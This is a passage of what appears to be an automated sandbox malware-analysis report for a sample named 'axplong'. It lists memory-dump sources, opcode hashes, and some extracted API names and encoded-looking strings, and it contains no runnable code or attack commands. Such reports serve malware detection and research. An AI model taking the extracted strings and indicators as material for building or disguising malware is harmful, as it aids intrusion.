                                                                                                                                                                                                                                          • Associated: 00000002.00000002.4455363098.0000000000E68000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.4455541927.0000000000E6A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_9c0000_axplong.jbxd
                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 2f2974a200ef6257ab1168563da8fe17786fedf6d416b7e4b343f4e928623235
                                                                                                                                                                                                                                          • Instruction ID: 81eb269087f6c5a4d61232b313edd865794a5c6c0a1376d04b4031fc995960aa
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2f2974a200ef6257ab1168563da8fe17786fedf6d416b7e4b343f4e928623235
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 22225FB3F515144BDB4CCB9DDCA27EDB2E3AFD8218B0E803DA40AE3345EA79D9158644
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.4452228796.00000000009C1000.00000040.00000001.01000000.00000007.sdmp, Offset: 009C0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.4452167558.00000000009C0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.4452228796.0000000000A22000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.4452503789.0000000000A29000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.4452577751.0000000000A2B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.4452577751.0000000000BAF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.4452577751.0000000000C88000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.4452577751.0000000000CB7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.4452577751.0000000000CC0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.4452577751.0000000000CCF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.4454598928.0000000000CD0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.4455363098.0000000000E68000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.4455541927.0000000000E6A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_9c0000_axplong.jbxd
                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: dd9dbbba32ef4b6fc4b844053fc93a855d7c94bfa07db484e7c77deedd12937a
                                                                                                                                                                                                                                          • Instruction ID: 8b343bd4e9f1a8c92d255fedd84d1ef2d25d4a60f2c740878b93967548acccff
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: dd9dbbba32ef4b6fc4b844053fc93a855d7c94bfa07db484e7c77deedd12937a
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E6B14931A14609DFD719CF28D486B697BA0FF45364F298658E89ACF2E1C335E992CB40
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.4452228796.00000000009C1000.00000040.00000001.01000000.00000007.sdmp, Offset: 009C0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.4452167558.00000000009C0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.4452228796.0000000000A22000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.4452503789.0000000000A29000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.4452577751.0000000000A2B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.4452577751.0000000000BAF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.4452577751.0000000000C88000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.4452577751.0000000000CB7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.4452577751.0000000000CC0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.4452577751.0000000000CCF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.4454598928.0000000000CD0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.4455363098.0000000000E68000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.4455541927.0000000000E6A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_9c0000_axplong.jbxd
                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 361b34861adffeebed4c0b6a0233ff5c68b783de2887d3cf72c753a2b518e50b
                                                                                                                                                                                                                                          • Instruction ID: 524908f9f53428700c1820059e25c2a49c7a6323dfe3e7d2e91286617fa5a738
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 361b34861adffeebed4c0b6a0233ff5c68b783de2887d3cf72c753a2b518e50b
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 945191716083918FD319CF2D842567ABFE1BF96200F084A9EE0D687292D775DA04CB92
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.4452228796.00000000009C1000.00000040.00000001.01000000.00000007.sdmp, Offset: 009C0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.4452167558.00000000009C0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.4452228796.0000000000A22000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.4452503789.0000000000A29000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.4452577751.0000000000A2B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.4452577751.0000000000BAF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.4452577751.0000000000C88000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.4452577751.0000000000CB7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.4452577751.0000000000CC0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.4452577751.0000000000CCF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.4454598928.0000000000CD0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.4455363098.0000000000E68000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.4455541927.0000000000E6A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_9c0000_axplong.jbxd
                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 7f4159d108bdd06156a9c4401f554125621a063dfa1bee46bfa3bb6421ff03dd
                                                                                                                                                                                                                                          • Instruction ID: 27b004f45b70aa1632b37749b11f354bd4204c93f26e80a6050503b03116ca57
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7f4159d108bdd06156a9c4401f554125621a063dfa1bee46bfa3bb6421ff03dd
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D521D673F2043947770CC47E8C5327DB6E1C68C600745823AE8A6EA2C1D968D917E2E4
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.4452228796.00000000009C1000.00000040.00000001.01000000.00000007.sdmp, Offset: 009C0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.4452167558.00000000009C0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.4452228796.0000000000A22000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.4452503789.0000000000A29000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.4452577751.0000000000A2B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.4452577751.0000000000BAF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.4452577751.0000000000C88000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.4452577751.0000000000CB7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.4452577751.0000000000CC0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.4452577751.0000000000CCF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.4454598928.0000000000CD0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.4455363098.0000000000E68000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.4455541927.0000000000E6A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_9c0000_axplong.jbxd
                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: b920966d8c5ac9d0bd23672470490ae35fe7a89e12d080ec07b63dbefd214b3b
                                                                                                                                                                                                                                          • Instruction ID: 6f2c1f923387498ba80c6fd51003176b118da7c2f1c79bd9dd89bc83b6c921b8
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b920966d8c5ac9d0bd23672470490ae35fe7a89e12d080ec07b63dbefd214b3b
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: CE11A723F30C295B675C81BD8C1727AA1D2EBD825071F433AD827E72C4E9A4DE13D290
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.4452228796.00000000009C1000.00000040.00000001.01000000.00000007.sdmp, Offset: 009C0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.4452167558.00000000009C0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.4452228796.0000000000A22000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.4452503789.0000000000A29000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.4452577751.0000000000A2B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.4452577751.0000000000BAF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.4452577751.0000000000C88000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.4452577751.0000000000CB7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.4452577751.0000000000CC0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.4452577751.0000000000CCF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.4454598928.0000000000CD0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.4455363098.0000000000E68000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.4455541927.0000000000E6A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_9c0000_axplong.jbxd
                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                                                                                                                                                                                                          • Instruction ID: d9672ee8112099821a865a179280bf794fcc9d77a3e215e8443ab866eb264a55
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C7112B7B60008A87D6148B2EF8F86B6A795EFC532073C437AD1C24B7DCDB2A99459608
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.4452228796.00000000009C1000.00000040.00000001.01000000.00000007.sdmp, Offset: 009C0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.4452167558.00000000009C0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.4452228796.0000000000A22000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.4452503789.0000000000A29000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.4452577751.0000000000A2B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.4452577751.0000000000BAF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.4452577751.0000000000C88000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.4452577751.0000000000CB7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.4452577751.0000000000CC0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.4452577751.0000000000CCF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.4454598928.0000000000CD0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.4455363098.0000000000E68000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.4455541927.0000000000E6A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_9c0000_axplong.jbxd
                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 568e6db9a80f69a66fec1d91940bcb222699d0590b28219559302f84a7e77d71
                                                                                                                                                                                                                                          • Instruction ID: 229790e9fb522d20cf1f36ecfa46e63408e0bd736a73409a3ecb443ad8b4bb8e
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 568e6db9a80f69a66fec1d91940bcb222699d0590b28219559302f84a7e77d71
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 27E08C3024264CAECE2A7B14C809A683F2AEF52399F008804F91846232CB26EC81CA90
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.4452228796.00000000009C1000.00000040.00000001.01000000.00000007.sdmp, Offset: 009C0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.4452167558.00000000009C0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.4452228796.0000000000A22000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.4452503789.0000000000A29000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.4452577751.0000000000A2B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.4452577751.0000000000BAF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.4452577751.0000000000C88000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.4452577751.0000000000CB7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.4452577751.0000000000CC0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.4452577751.0000000000CCF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.4454598928.0000000000CD0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.4455363098.0000000000E68000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.4455541927.0000000000E6A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_9c0000_axplong.jbxd
                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: e6d3f81bf9612d8360929edb31d8ce1375adbaa32f41a7c69d112e79a3c508fb
                                                                                                                                                                                                                                          • Instruction ID: 4d8d2557fca7793d9d5f3685df59738f2a23b2cb66070bd47fe107764e592a06
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e6d3f81bf9612d8360929edb31d8ce1375adbaa32f41a7c69d112e79a3c508fb
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A7E08C72A1923CEBCB24DB88C944A9AF3ECEB88B00F120496B605E3250C274DE00C7D0
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.4452228796.00000000009C1000.00000040.00000001.01000000.00000007.sdmp, Offset: 009C0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.4452167558.00000000009C0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.4452228796.0000000000A22000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.4452503789.0000000000A29000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.4452577751.0000000000A2B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.4452577751.0000000000BAF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.4452577751.0000000000C88000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.4452577751.0000000000CB7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.4452577751.0000000000CC0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.4452577751.0000000000CCF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.4454598928.0000000000CD0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.4455363098.0000000000E68000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.4455541927.0000000000E6A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_9c0000_axplong.jbxd
                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID: 246122658369$9wGTaHilQw==$Gl==$Inhk$Xst=$invalid stoi argument$stoi argument out of range
                                                                                                                                                                                                                                          • API String ID: 0-301961687
                                                                                                                                                                                                                                          • Opcode ID: c8ee7d0e78d4950d7216247ecaa23135c25d1283325f644aae8a67b986a50e57
                                                                                                                                                                                                                                          • Instruction ID: 65355660565604f6496632bb8c5a9ece42f3f8789c1fa89c7cfcb239993ba446
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c8ee7d0e78d4950d7216247ecaa23135c25d1283325f644aae8a67b986a50e57
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F702C170900248EFEF14DFA8C945BDEBBB5EF45304F508599E805A7382D7759A84CFA2
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.4452228796.00000000009C1000.00000040.00000001.01000000.00000007.sdmp, Offset: 009C0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.4452167558.00000000009C0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.4452228796.0000000000A22000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.4452503789.0000000000A29000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.4452577751.0000000000A2B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.4452577751.0000000000BAF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.4452577751.0000000000C88000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.4452577751.0000000000CB7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.4452577751.0000000000CC0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.4452577751.0000000000CCF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.4454598928.0000000000CD0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.4455363098.0000000000E68000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.4455541927.0000000000E6A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_9c0000_axplong.jbxd
                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Mtx_unlock$CurrentThread$Cnd_broadcast
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 57040152-0
                                                                                                                                                                                                                                          • Opcode ID: 089cf520ce97d9db8ed3960977a40a0699e63a064de8f74f2f5585c6aa96b071
                                                                                                                                                                                                                                          • Instruction ID: adae3f8f8a90039dc553cbca25ca1a6534d49bb0dced939999981212223fee1d
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 089cf520ce97d9db8ed3960977a40a0699e63a064de8f74f2f5585c6aa96b071
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 80A1D0B1E4521A9FDB20DB64C944B6AB7B8FF45350F04C66EE815D7381EB34EA04CB92
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • _ValidateLocalCookies.LIBCMT ref: 009F4787
                                                                                                                                                                                                                                          • ___except_validate_context_record.LIBVCRUNTIME ref: 009F478F
                                                                                                                                                                                                                                          • _ValidateLocalCookies.LIBCMT ref: 009F4818
                                                                                                                                                                                                                                          • __IsNonwritableInCurrentImage.LIBCMT ref: 009F4843
                                                                                                                                                                                                                                          • _ValidateLocalCookies.LIBCMT ref: 009F4898
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.4452228796.00000000009C1000.00000040.00000001.01000000.00000007.sdmp, Offset: 009C0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.4452167558.00000000009C0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.4452228796.0000000000A22000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.4452503789.0000000000A29000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.4452577751.0000000000A2B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.4452577751.0000000000BAF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.4452577751.0000000000C88000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.4452577751.0000000000CB7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.4452577751.0000000000CC0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.4452577751.0000000000CCF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.4454598928.0000000000CD0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.4455363098.0000000000E68000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.4455541927.0000000000E6A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_9c0000_axplong.jbxd
                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                                                                                                                                                                          • String ID: csm
                                                                                                                                                                                                                                          • API String ID: 1170836740-1018135373
                                                                                                                                                                                                                                          • Opcode ID: 25a0334bb1f34bdb6c7793574b290def5f245402356b780b30b9a5d21f80ab8f
                                                                                                                                                                                                                                          • Instruction ID: 05fcebee4ce5d5b8fc5f7b3126a6bbce69d09c3abba765a2ed1688479b48b3dd
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 25a0334bb1f34bdb6c7793574b290def5f245402356b780b30b9a5d21f80ab8f
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F051B434A0024CABCF10DF68D881ABF7BB9BF85364F148165EA159B352D732EE55CB90
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.4452228796.00000000009C1000.00000040.00000001.01000000.00000007.sdmp, Offset: 009C0000, based on PE: true
